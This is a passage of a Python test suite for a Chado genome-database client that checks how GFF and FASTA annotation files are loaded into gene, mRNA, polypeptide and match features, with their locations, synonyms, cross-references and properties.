.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
        assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
def test_load_gff_nolandmark(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Should create the landmark
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig", no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
        assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
@raises(Exception)
def test_load_gff_nolandmark_fail(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
        # No landmark_type given => loading should fail
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
        assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
def test_load_gff_match(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
an_match = self._create_fake_an('matches')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
self.ci.feature.load_gff(gff="./test-data/matches.gff", analysis_id=an_match['analysis_id'], organism_id=org['organism_id'], no_seq_compute=True)
# Check match
match_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein_XP_012228303.1_match_0001") \
.one()
matchterm = self.ci.get_cvterm_id('match', 'sequence')
matchpartterm = self.ci.get_cvterm_id('match_part', 'sequence')
assert match_f.dbxref_id is None, "gff>match loaded correctly"
assert match_f.organism_id == org['organism_id'], "gff>match loaded correctly"
assert match_f.name == "PAC:18136238-protein_XP_012228303.1_match_0001", "gff>match loaded correctly"
assert match_f.uniquename == "PAC:18136238-protein_XP_012228303.1_match_0001", "gff>match loaded correctly"
assert match_f.residues is None, "gff>match loaded correctly"
assert match_f.seqlen is None, "gff>match loaded correctly"
assert match_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>match loaded correctly"
assert match_f.type_id == matchterm, "gff>match loaded correctly"
assert match_f.is_analysis is False, "gff>match loaded correctly"
assert match_f.is_obsolete is False, "gff>match loaded correctly"
assert len(match_f.featureloc_collection) == 1, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].srcfeature.uniquename == 'PAC:18136238-protein', "gff>match loaded correctly"
assert match_f.featureloc_collection[0].fmin == 50, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].fmax == 325, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].strand is None, "gff>match loaded correctly"
assert match_f.featureloc_collection[0].phase == 0, "gff>match loaded correctly"
# Check relationships
assert len(match_f.object_in_relationships) == 1, "match_part relationship"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert match_f.object_in_relationships[0].type_id == partofterm, "match_part relationship"
# Check gene featureprop
expected = [
'e-value___1e-27___0',
'hit_description___PREDICTED: uncharacterized protein LOC105675603 [Linepithema humile]___0',
'hit_name___XP_012228303.1___0'
]
assert len(match_f.featureprop_collection) == 3, "gff>match loaded correctly"
for prop in match_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>match loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
match_part = match_f.object_in_relationships[0].subject
assert match_part.dbxref_id is None, "gff>match loaded correctly"
assert match_part.organism_id == org['organism_id'], "gff>match loaded correctly"
assert match_part.name == "PAC:18136238-protein_XP_012228303.1_match_0001_1", "gff>match loaded correctly"
assert match_part.uniquename == "PAC:18136238-protein_XP_012228303.1_match_0001_1", "gff>match loaded correctly"
assert match_part.residues is None, "gff>match loaded correctly"
assert match_part.seqlen is None, "gff>match loaded correctly"
assert match_part.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>match loaded correctly"
assert match_part.type_id == matchpartterm, "match_part"
assert match_part.is_analysis is False, "gff>match loaded correctly"
assert match_part.is_obsolete is False, "gff>match loaded correctly"
assert len(match_part.featureloc_collection) == 1, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].srcfeature.uniquename == 'PAC:18136238-protein', "gff>match loaded correctly"
assert match_part.featureloc_collection[0].fmin == 50, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].fmax == 325, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].strand is None, "gff>match loaded correctly"
assert match_part.featureloc_collection[0].phase == 1, "gff>match loaded correctly"
# Check gene featureprop
expected = [
'target___XP_012228303.1+21+302___0'
]
assert len(match_part.featureprop_collection) == 1, "gff>match loaded correctly"
for prop in match_part.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>match loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check analysisfeature
assert match_f.analysisfeature_collection[0].analysis_id == an_match['analysis_id'], "gff>match loaded correctly"
assert match_f.analysisfeature_collection[0].significance == 303, "gff>match loaded correctly"
assert match_part.analysisfeature_collection[0].analysis_id == an_match['analysis_id'], "gff>match loaded correctly"
assert match_part.analysisfeature_collection[0].significance == 303, "gff>match loaded correctly"
def test_load_gff_withpepfasta(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'])
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/prots.fa")
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues == "SGTRGVDFSVFDC", "gff>fasta seq loaded correctly"
assert pep_f.seqlen == 13, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "744bbb7c3f619a479ea90b4e9f627bd1", "gff>fasta seq loaded correctly"
def test_load_gff_withlandmarkfasta(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig")
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.one()
assert lm_f.residues.startswith("TTTTGTATTCTATGTCCTCTGATCTTT"), "gff>fasta seq loaded correctly"
assert lm_f.seqlen == 5927163, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum == "80db0e5ccdc07e200c035d23c5951271", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues.startswith("AAAGGAATTGAGTTTCATTAAGAATTTAAATAAAACAATGTCATAATCCGGGTATTTGGAATATT"), "gff>fasta seq loaded correctly"
assert mrna_f.seqlen == 1212, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum == "ad0d8a5031b63bacfe23296c80072550", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues.startswith("KGIEFH*EFK*NNVIIRVFGIFKLQPGLVVMQRPTR*QNDNLALVLGFRSFVHSFSS*AKANWNLTKCNAYTSSEPEQHSSYKXXXXXXXXXXXXXXXXXXXXXX"), "gff>fasta seq loaded correctly"
assert pep_f.seqlen == 404, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "fbf522da5203405c620eb708afd3cc9f", "gff>fasta seq loaded correctly"
def test_load_gff_withlandmarkonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Here the gff will create a supercontig, and other features will be mapped on it.
# No fasta => no computed seq
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="supercontig")
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.one()
assert lm_f.residues is None, "gff>fasta seq loaded correctly"
assert lm_f.seqlen is None, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues is None, "gff>fasta seq loaded correctly"
assert mrna_f.seqlen is None, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues is None, "gff>fasta seq loaded correctly"
assert pep_f.seqlen is None, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
def test_load_gff_withexistinglandmarkonly(self):
org = self._create_fake_org()
an = self._create_fake_an()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_fasta(fasta="./test-data/genome.fa", analysis_id=an['analysis_id'], organism_id=org['organism_id'], sequence_type='supercontig')
        # No fasta => seq computed from already loaded genome
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="supercontig")
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.one()
assert lm_f.residues is not None, "gff>fasta seq loaded correctly"
assert lm_f.seqlen is not None, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum != "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues is not None, "gff>fasta seq loaded correctly"
assert mrna_f.seqlen is not None, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum != "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues is not None, "gff>fasta seq loaded correctly"
assert pep_f.seqlen is not None, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum != "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
@raises(Exception)
def test_load_gff_withoutlandmark(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
        # Here the gff will create a supercontig, and the loaded features will try to map onto a contig => fail
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'])
def test_load_gff_withwronglandmarkonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
# Here the gff will create a supercontig and a contig, and other features will be mapped on contig.
# No fasta => no computed seq
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig")
contigterm = self.ci.get_cvterm_id('contig', 'sequence')
# Check landmark
lm_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="scaffold00001") \
.filter_by(type_id=contigterm) \
.one()
assert lm_f.residues is None, "gff>fasta seq loaded correctly"
assert lm_f.seqlen is None, "gff>fasta seq loaded correctly"
assert lm_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
assert mrna_f.residues is None, "gff>fasta seq loaded correctly"
assert mrna_f.seqlen is None, "gff>fasta seq loaded correctly"
assert mrna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
# Check pep
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238-protein") \
.one()
assert pep_f.residues is None, "gff>fasta seq loaded correctly"
assert pep_f.seqlen is None, "gff>fasta seq loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>fasta seq loaded correctly"
def test_load_gff_relranks(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], landmark_type="contig")
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
# Check mrna
mrna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136238") \
.one()
rels = mrna_f.object_in_relationships
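        # Children should be ranked in genomic order: sorting by fmin and by rank must give the same order.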
locsorted_rels = []
for rel in rels:
if rel.type_id == partofterm:
locsorted_rels.append((rel.subject.featureloc_collection[0].fmin, rel.rank))
locsorted_rels = sorted(locsorted_rels, key=lambda x: x[0])
sorted_rels = sorted(locsorted_rels, key=lambda x: x[1])
assert locsorted_rels == sorted_rels, "children sorted correctly"
def test_load_gff_addonly(self):
org = self._create_fake_org()
an_gff = self._create_fake_an('gff')
self.ci.feature.load_gff(gff="./test-data/annot.gff", analysis_id=an_gff['analysis_id'], organism_id=org['organism_id'], fasta="./test-data/genome.fa", landmark_type="supercontig", no_seq_compute=True, add_only=True)
gene_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="orange1.1g015632m.g") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
geneterm = self.ci.get_cvterm_id('gene', 'sequence')
# Check gene feature
assert gene_f.dbxref_id is None, "gff>gene loaded correctly"
assert gene_f.organism_id == org['organism_id'], "gff>gene loaded correctly"
assert gene_f.name == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.uniquename == "orange1.1g015632m.g", "gff>gene loaded correctly"
assert gene_f.residues is None, "gff>gene loaded correctly"
assert gene_f.seqlen is None, "gff>gene loaded correctly"
assert gene_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>gene loaded correctly"
assert gene_f.type_id == geneterm, "gff>gene loaded correctly"
assert gene_f.is_analysis is False, "gff>gene loaded correctly"
assert gene_f.is_obsolete is False, "gff>gene loaded correctly"
# Check gene loc
        assert len(gene_f.featureloc_collection) == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmin == 4058459, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].fmax == 4062210, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmin_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].is_fmax_partial is False, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].strand == 1, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].phase is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].residue_info is None, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].locgroup == 0, "gff>gene located correctly"
assert gene_f.featureloc_collection[0].rank == 0, "gff>gene located correctly"
src_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=gene_f.featureloc_collection[0].srcfeature_id) \
.one()
assert src_f.uniquename == "scaffold00001", "gff>gene loaded correctly"
scaff1_id = src_f.feature_id
# Check gene aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in gene_f.feature_synonym_collection}
assert len(syns) == 2, "gff>gene aliases loaded correctly"
assert 'some-synonym' in syns, "gff>gene aliases loaded correctly"
assert 'another synonym' in syns, "gff>gene aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>gene aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>gene aliases loaded correctly"
# Check gene dbxref
dbs = self.ci.session.query(self.ci.model.db.db_id, self.ci.model.db.name, self.ci.model.db.description) \
.filter((self.ci.model.db.name == 'GO') | (self.ci.model.db.name == 'FOOBAR') | (self.ci.model.db.name == 'FOOBARXX') | (self.ci.model.db.name == 'GFF_source'))
for db in dbs:
if db.name == "FOOBAR":
assert db.description == "Added automatically by the GFF loader", "gff>gene dbxrefs db loaded correctly"
dbs = {db.name: db.db_id for db in dbs}
assert len(dbs) == 4, "gff>gene dbxrefs db loaded correctly"
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in gene_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>gene dbxrefs loaded correctly"
assert '0061611' in xrefs, "gff>gene dbxrefs loaded correctly"
assert '6528B' in xrefs, "gff>gene dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>gene dbxrefs loaded correctly"
assert xrefs['0061611'] == dbs['GO'], "gff>gene dbxrefs loaded correctly"
assert xrefs['6528B'] == dbs['FOOBAR'], "gff>gene dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>gene dbxrefs loaded correctly"
# Check gene featureprop
expected = [
'Gap___BLABLA___0',
'Gap___BLOBLO___1',
'Note___that\'s fantastic___0',
'Note___really___1',
'Poutrelle___test___1',
'Poutrelle___lapinou___0',
]
assert len(gene_f.featureprop_collection) == 6, "gff>gene loaded correctly"
for prop in gene_f.featureprop_collection:
assert prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank) in expected, "gff>gene loaded correctly"
expected.remove(prop.cvterm.name + '___' + prop.value + '___' + str(prop.rank))
# Check mrna
rna_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(uniquename="PAC:18136219") \
.join(self.ci.model.featureloc, self.ci.model.featureloc.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.feature_synonym, self.ci.model.feature_synonym.feature_id == self.ci.model.feature.feature_id) \
.join(self.ci.model.synonym, self.ci.model.feature_synonym.synonym_id == self.ci.model.synonym.synonym_id) \
.one()
rnaterm = self.ci.get_cvterm_id('mRNA', 'sequence')
# Check mRNA feature
assert rna_f.dbxref_id is None, "gff>mRNA loaded correctly"
assert rna_f.organism_id == org['organism_id'], "gff>mRNA loaded correctly"
assert rna_f.name == "orange1.1g015615m", "gff>mRNA loaded correctly"
assert rna_f.uniquename == "PAC:18136219", "gff>mRNA loaded correctly"
assert rna_f.residues is None, "gff>mRNA loaded correctly"
assert rna_f.seqlen is None, "gff>mRNA loaded correctly"
assert rna_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>mRNA loaded correctly"
assert rna_f.type_id == rnaterm, "gff>mRNA loaded correctly"
assert rna_f.is_analysis is False, "gff>mRNA loaded correctly"
assert rna_f.is_obsolete is False, "gff>mRNA loaded correctly"
# Check mRNA loc
        assert len(rna_f.featureloc_collection) == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmin == 4058759, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].fmax == 4062210, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmin_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].is_fmax_partial is False, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].strand == 1, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].phase is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].residue_info is None, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].locgroup == 0, "gff>mRNA located correctly"
assert rna_f.featureloc_collection[0].rank == 0, "gff>mRNA located correctly"
assert scaff1_id == rna_f.featureloc_collection[0].srcfeature_id, "gff>mRNA loaded correctly"
# Check mRNA aliases
exactterm = self.ci.get_cvterm_id('exact', 'synonym_type')
syns = {synf.synonym.name: synf.synonym.type_id for synf in rna_f.feature_synonym_collection}
assert len(syns) == 2, "gff>mRNA aliases loaded correctly"
assert 'some-synonym' in syns, "gff>mRNA aliases loaded correctly"
assert 'another synonym' in syns, "gff>mRNA aliases loaded correctly"
assert syns['some-synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
assert syns['another synonym'] == exactterm, "gff>mRNA aliases loaded correctly"
# Check mRNA dbxref
xrefs = {dbx.dbxref.accession: dbx.dbxref.db_id for dbx in rna_f.feature_dbxref_collection}
assert len(xrefs) == 3, "gff>mRNA dbxrefs loaded correctly"
assert '0061621' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert '6528A' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert 'phytozome6' in xrefs, "gff>mRNA dbxrefs loaded correctly"
assert xrefs['0061621'] == dbs['GO'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['6528A'] == dbs['FOOBARXX'], "gff>mRNA dbxrefs loaded correctly"
assert xrefs['phytozome6'] == dbs['GFF_source'], "gff>mRNA dbxrefs loaded correctly"
# Check relationships
parents = {x.object_id: x.type_id for x in rna_f.subject_in_relationships}
assert len(parents) == 1, "mRNA relationships"
partofterm = self.ci.get_cvterm_id('part_of', 'sequence')
assert rna_f.subject_in_relationships[0].type_id == partofterm, "mRNA relationships"
derivesfromterm = self.ci.get_cvterm_id('derives_from', 'sequence')
peps = [x.subject_id for x in rna_f.object_in_relationships if x.type_id == derivesfromterm]
assert len(peps) == 1, "mRNA relationships, single peptide"
pep_f = self.ci.session.query(self.ci.model.feature) \
.filter_by(feature_id=peps[0]) \
.one()
# Check pep feature
pepterm = self.ci.get_cvterm_id('polypeptide', 'sequence')
assert pep_f.dbxref_id is None, "gff>pep loaded correctly"
assert pep_f.organism_id == org['organism_id'], "gff>pep loaded correctly"
assert pep_f.name == "orange1.1g015615m", "gff>pep loaded correctly"
assert pep_f.uniquename == "PAC:18136219-protein", "gff>pep loaded correctly"
assert pep_f.residues is None, "gff>pep loaded correctly"
assert pep_f.seqlen is None, "gff>pep loaded correctly"
assert pep_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>pep loaded correctly"
assert pep_f.type_id == pepterm, "gff>pep loaded correctly"
assert pep_f.is_analysis is False, "gff>pep loaded correctly"
assert pep_f.is_obsolete is False, "gff>pep loaded correctly"
# Check pep loc
assert len(pep_f.featureloc_collection) == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmin == 4059234, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].fmax == 4061905, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmin_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].is_fmax_partial is False, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].strand == 1, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].phase is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].residue_info is None, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].locgroup == 0, "gff>pep located correctly"
assert pep_f.featureloc_collection[0].rank == 0, "gff>pep located correctly"
assert scaff1_id == pep_f.featureloc_collection[0].srcfeature_id, "gff>pep loaded correctly"
children = {x.subject_id: x for x in rna_f.object_in_relationships if x.type_id != derivesfromterm}
        assert len(children) == 15, "mRNA relationships, child subfeatures"
cdsterm = self.ci.get_cvterm_id('CDS', 'sequence')
exonterm = self.ci.get_cvterm_id('exon', 'sequence')
utr3term = self.ci.get_cvterm_id('three_prime_UTR', 'sequence')
utr5term = self.ci.get_cvterm_id('five_prime_UTR', 'sequence')
for c in children:
assert children[c].type_id == partofterm, "subsubfeatures"
if children[c].subject.type_id == utr3term:
subsub_f = children[c].subject
assert children[c].subject.type_id in (cdsterm, exonterm, utr3term, utr5term), "subsubfeatures"
# Check a subsubfeature
assert subsub_f.dbxref_id is None, "gff>utr loaded correctly"
assert subsub_f.organism_id == org['organism_id'], "gff>utr loaded correctly"
assert subsub_f.name.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.uniquename.endswith("-three_prime_UTR-scaffold00001:4061905..4062210"), "gff>utr loaded correctly"
assert subsub_f.residues is None, "gff>utr loaded correctly"
assert subsub_f.seqlen is None, "gff>utr loaded correctly"
assert subsub_f.md5checksum == "d41d8cd98f00b204e9800998ecf8427e", "gff>utr loaded correctly"
assert subsub_f.type_id == utr3term, "gff>utr loaded correctly"
assert subsub_f.is_analysis is False, "gff>utr loaded correctly"
assert subsub_f.is_obsolete is False, "gff>utr loaded correctly"
assert len(subsub_f.featureloc_collection) == 1, "gff>utr located correctly"
